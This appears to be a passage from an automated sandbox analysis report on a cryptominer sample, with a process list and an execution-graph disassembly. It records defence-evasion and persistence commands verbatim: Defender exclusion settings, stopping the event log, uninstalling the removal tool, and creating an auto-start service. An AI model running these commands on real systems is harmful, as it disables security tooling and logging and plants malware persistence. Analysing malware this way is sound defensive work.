                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff79ade0000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                      Imagebase:0x7ff73bd10000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                      Imagebase:0x7ff73bd10000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:10
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                      Imagebase:0x7ff73bd10000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:11
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:12
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                      Imagebase:0x7ff73bd10000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:13
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe delete "ODTUTVYC"
                                                      Imagebase:0x7ff7e0890000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:14
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:15
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:16
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:17
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff6e3d00000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:18
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe create "ODTUTVYC" binpath= "C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe" start= "auto"
                                                      Imagebase:0x7ff7e0890000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:19
                                                      Start time:15:11:05
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:20
                                                      Start time:15:11:06
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                      Imagebase:0x7ff7e0890000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:21
                                                      Start time:15:11:06
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe start "ODTUTVYC"
                                                      Imagebase:0x7ff7e0890000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:22
                                                      Start time:15:11:06
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:23
                                                      Start time:15:11:06
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:24
                                                      Start time:15:11:06
                                                      Start date:31/10/2024
                                                      Path:C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe
                                                      Imagebase:0x7ff759bf0000
                                                      File size:2'630'144 bytes
                                                      MD5 hash:A44C57DED5F0E75DD398F8BDE8C83219
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 63%, ReversingLabs
                                                      Has exited:true

                                                      General

                                                      Target ID:25
                                                      Start time:15:11:06
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:26
                                                      Start time:15:11:06
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:27
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff79ade0000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:28
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                      Imagebase:0x7ff73bd10000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:29
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:30
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                      Imagebase:0x7ff66e660000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:31
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:32
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                      Imagebase:0x7ff73bd10000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:33
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                      Imagebase:0x7ff73bd10000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:34
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:35
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:36
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:37
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:38
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:explorer.exe
                                                      Imagebase:0x7ff609140000
                                                      File size:5'141'208 bytes
                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.4573167286.000000000100C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.4573167286.0000000000F50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.4573167286.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      Has exited:false

                                                      General

                                                      Target ID:39
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff6e3d00000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:44
                                                      Start time:15:11:47
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                      Imagebase:0x7ff7403e0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:3.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:11.5%
                                                        Total number of Nodes:1623
                                                        Total number of Limit Nodes:2
                                                        execution_graph 4380 7ff6c532219e 4381 7ff6c53221ab EnterCriticalSection 4380->4381 4382 7ff6c5322272 4380->4382 4383 7ff6c5322265 LeaveCriticalSection 4381->4383 4385 7ff6c53221c8 4381->4385 4383->4382 4384 7ff6c53221e9 TlsGetValue GetLastError 4384->4385 4385->4383 4385->4384 2733 7ff6c5321140 2736 7ff6c5321160 2733->2736 2735 7ff6c5321156 2737 7ff6c53211b9 2736->2737 2738 7ff6c532118b 2736->2738 2740 7ff6c53211c7 _amsg_exit 2737->2740 2741 7ff6c53211d3 2737->2741 2738->2737 2739 7ff6c5321190 2738->2739 2739->2737 2742 7ff6c53211a0 Sleep 2739->2742 2740->2741 2743 7ff6c532121a 2741->2743 2744 7ff6c5321201 _initterm 2741->2744 2742->2737 2742->2739 2761 7ff6c5321880 2743->2761 2744->2743 2746 7ff6c5321247 SetUnhandledExceptionFilter 2747 7ff6c532126a 2746->2747 2748 7ff6c532126f malloc 2747->2748 2749 7ff6c532128b 2748->2749 2752 7ff6c53212d2 2748->2752 2750 7ff6c53212a0 strlen malloc memcpy 2749->2750 2750->2750 2751 7ff6c53212d0 2750->2751 2751->2752 2768 7ff6c5323b50 2752->2768 2754 7ff6c5321315 2755 7ff6c5321344 2754->2755 2756 7ff6c5321324 2754->2756 2759 7ff6c5321160 93 API calls 2755->2759 2757 7ff6c5321338 2756->2757 2758 7ff6c532132d _cexit 2756->2758 2757->2735 2758->2757 2760 7ff6c5321366 2759->2760 2760->2735 2762 7ff6c53218a2 2761->2762 2764 7ff6c5321a0f 2761->2764 2762->2764 2765 7ff6c532199e 2762->2765 2766 7ff6c5321956 2762->2766 2764->2746 2765->2764 2767 7ff6c53219e9 VirtualProtect 2765->2767 2766->2765 2943 7ff6c5321ba0 2766->2943 2767->2765 2770 7ff6c5323b66 2768->2770 2769 7ff6c5323c60 wcslen 2953 7ff6c532153f 2769->2953 2770->2769 2775 7ff6c5323d60 2778 7ff6c5323d7a memset wcscat memset 2775->2778 2780 7ff6c5323dd3 2778->2780 2781 7ff6c5323e23 wcslen 2780->2781 2782 7ff6c5323e35 2781->2782 2786 7ff6c5323e7c 2781->2786 2783 7ff6c5323e50 _wcsnicmp 2782->2783 2784 7ff6c5323e66 wcslen 2783->2784 2783->2786 2784->2783 2784->2786 2785 7ff6c5323edd wcscpy wcscat memset 2787 7ff6c5323f1c 2785->2787 2786->2785 2788 7ff6c5324024 wcscpy wcscat 2787->2788 2789 7ff6c532404f memset 2788->2789 2793 7ff6c5324131 2788->2793 2790 7ff6c5324070 2789->2790 2791 7ff6c53240d5 wcslen 2790->2791 2792 7ff6c53240eb 2791->2792 2798 7ff6c532412c 2791->2798 2795 7ff6c5324100 _wcsnicmp 2792->2795 3145 7ff6c5322df0 2793->3145 2796 7ff6c5324116 wcslen 2795->2796 2795->2798 2796->2795 2796->2798 2797 7ff6c53243a3 wcscpy wcscat memset 2800 7ff6c53243e5 2797->2800 2798->2797 2799 7ff6c532442a wcscpy wcscat memset 2801 7ff6c5324470 2799->2801 2800->2799 2802 7ff6c53244d5 wcscpy wcscat memset 2801->2802 2803 7ff6c532451b 2802->2803 2804 7ff6c532454b wcscpy wcscat 2803->2804 2805 7ff6c5326730 memcpy 2804->2805 2806 7ff6c532457d 2804->2806 2805->2806 2807 7ff6c5322df0 11 API calls 2806->2807 2808 7ff6c532472c 2807->2808 2809 7ff6c5322df0 11 API calls 2808->2809 2810 7ff6c5324840 memset 2809->2810 2811 7ff6c5324861 2810->2811 2812 7ff6c53248a4 wcscpy wcscat memset 2811->2812 2813 7ff6c53248ed 2812->2813 2814 7ff6c5324930 wcscpy wcscat wcslen 2813->2814 3157 7ff6c532146d 2814->3157 2817 7ff6c5324a44 2820 7ff6c5324b3a wcslen 2817->2820 2826 7ff6c5324d2d 2817->2826 3329 7ff6c532157b 2820->3329 2821 7ff6c532145e 2 API calls 2821->2817 2825 7ff6c5324d0c memset 2825->2826 2827 7ff6c5324d9d wcscpy wcscat 2826->2827 2831 7ff6c5324dcf 2827->2831 2828 7ff6c5324c9f wcslen 3371 7ff6c53215e4 2828->3371 2833 7ff6c5322df0 11 API calls 2831->2833 2832 7ff6c532145e 2 API calls 2832->2825 2836 7ff6c5324ed7 2833->2836 2834 7ff6c5324bf9 2834->2825 2834->2828 2835 7ff6c5322df0 11 API calls 2837 7ff6c5324fec 2835->2837 2836->2835 2838 7ff6c5322df0 11 API calls 2837->2838 2839 7ff6c53250d6 2838->2839 2840 7ff6c5322df0 11 API calls 2839->2840 2842 7ff6c53251c0 2840->2842 2841 7ff6c5325301 wcslen 2843 7ff6c532157b 2 API calls 2841->2843 2842->2841 2844 7ff6c532538b 2843->2844 2845 7ff6c5325393 memset 2844->2845 2848 7ff6c53254a5 2844->2848 2846 7ff6c53253b4 2845->2846 2847 7ff6c5325404 wcslen 2846->2847 3374 7ff6c53215a8 2847->3374 2850 7ff6c5322df0 11 API calls 2848->2850 2857 7ff6c5325642 _wcsicmp 2848->2857 2856 7ff6c5325550 2850->2856 2852 7ff6c5325499 2854 7ff6c532145e 2 API calls 2852->2854 2853 7ff6c5325474 _wcsnicmp 2853->2852 2861 7ff6c5325c51 2853->2861 2854->2848 2855 7ff6c5322df0 11 API calls 2855->2857 2856->2855 2859 7ff6c532565d memset 2857->2859 2873 7ff6c53259e0 2857->2873 2858 7ff6c5325cae wcslen 2860 7ff6c53215a8 2 API calls 2858->2860 2864 7ff6c5325681 2859->2864 2862 7ff6c5325d0a 2860->2862 2861->2858 2865 7ff6c532145e 2 API calls 2862->2865 2863 7ff6c53256c6 wcscpy wcscat wcslen 2867 7ff6c532146d 2 API calls 2863->2867 2864->2863 2865->2848 2866 7ff6c5325a69 wcslen 2868 7ff6c532153f 2 API calls 2866->2868 2869 7ff6c5325793 2867->2869 2870 7ff6c5325af4 2868->2870 3387 7ff6c5321530 2869->3387 2872 7ff6c532145e 2 API calls 2870->2872 2875 7ff6c5325b05 2872->2875 2873->2866 2886 7ff6c5325b9c 2875->2886 3645 7ff6c5322f70 2875->3645 2876 7ff6c5326f06 2878 7ff6c532145e 2 API calls 2876->2878 2877 7ff6c53257d1 3426 7ff6c53214a9 2877->3426 2882 7ff6c5326f12 2878->2882 2881 7ff6c5325bf9 wcslen 2887 7ff6c5325c0f 2881->2887 2903 7ff6c5325c4c 2881->2903 2882->2754 2884 7ff6c532586d 2890 7ff6c532145e 2 API calls 2884->2890 2885 7ff6c5325b32 3649 7ff6c53238e0 2885->3649 2886->2881 2891 7ff6c5325c20 _wcsnicmp 2887->2891 2895 7ff6c5325861 2890->2895 2892 7ff6c5325c36 wcslen 2891->2892 2891->2903 2892->2891 2892->2903 3574 7ff6c5323350 memset 2895->3574 2896 7ff6c5325db9 memset wcscpy wcscat 2899 7ff6c5322f70 2 API calls 2896->2899 2897 7ff6c5325855 2900 7ff6c532145e 2 API calls 2897->2900 2898 7ff6c53214c7 2 API calls 2901 7ff6c5325b8e 2898->2901 2904 7ff6c5325e10 2899->2904 2900->2895 2901->2886 2907 7ff6c532145e 2 API calls 2901->2907 2903->2896 2906 7ff6c5323350 11 API calls 2904->2906 2909 7ff6c5325e28 2906->2909 2907->2886 2910 7ff6c53214c7 2 API calls 2909->2910 2911 7ff6c5325e56 memset 2910->2911 2914 7ff6c5325e77 2911->2914 2912 7ff6c5322df0 11 API calls 2922 7ff6c5325945 2912->2922 2913 7ff6c53258bc 2913->2912 2915 7ff6c5325ec7 wcslen 2914->2915 2916 7ff6c5325f17 wcscat memset 2915->2916 2917 7ff6c5325ed9 2915->2917 2923 7ff6c5325f51 2916->2923 2919 7ff6c5325ef0 _wcsnicmp 2917->2919 2919->2916 2921 7ff6c5325f02 wcslen 2919->2921 2920 7ff6c5322df0 11 API calls 2925 7ff6c5324234 2920->2925 2921->2916 2921->2919 2922->2920 2924 7ff6c5325fc1 wcscpy wcscat 2923->2924 2926 7ff6c5325ff3 2924->2926 2925->2754 2927 7ff6c5326e7a memcpy 2926->2927 2928 7ff6c5326130 2926->2928 2927->2928 2929 7ff6c53262f7 wcslen 2928->2929 2930 7ff6c532153f 2 API calls 2929->2930 2931 7ff6c5326382 2930->2931 2932 7ff6c532145e 2 API calls 2931->2932 2933 7ff6c5326393 2932->2933 2934 7ff6c5326432 2933->2934 2936 7ff6c5322f70 2 API calls 2933->2936 2935 7ff6c532145e 2 API calls 2934->2935 2935->2925 2937 7ff6c53263c0 2936->2937 2938 7ff6c53238e0 11 API calls 2937->2938 2939 7ff6c53263ec 2938->2939 2940 7ff6c53214c7 2 API calls 2939->2940 2941 7ff6c5326424 2940->2941 2941->2934 2942 7ff6c532145e 2 API calls 2941->2942 2942->2934 2946 7ff6c5321bc2 2943->2946 2944 7ff6c5321c04 memcpy 2944->2766 2946->2944 2947 7ff6c5321c45 VirtualQuery 2946->2947 2948 7ff6c5321cf4 2946->2948 2947->2948 2952 7ff6c5321c72 2947->2952 2949 7ff6c5321d23 GetLastError 2948->2949 2951 7ff6c5321d37 2949->2951 2950 7ff6c5321ca4 VirtualProtect 2950->2944 2950->2949 2952->2944 2952->2950 3672 7ff6c5321394 2953->3672 2955 7ff6c532154e 2956 7ff6c5321394 2 API calls 2955->2956 2957 7ff6c5321558 2956->2957 2958 7ff6c532155d 2957->2958 2959 7ff6c5321394 2 API calls 2957->2959 2960 7ff6c5321394 2 API calls 2958->2960 2959->2958 2961 7ff6c5321567 2960->2961 2962 7ff6c532156c 2961->2962 2963 7ff6c5321394 2 API calls 2961->2963 2964 7ff6c5321394 2 API calls 2962->2964 2963->2962 2965 7ff6c5321576 2964->2965 2966 7ff6c532157b 2965->2966 2967 7ff6c5321394 2 API calls 2965->2967 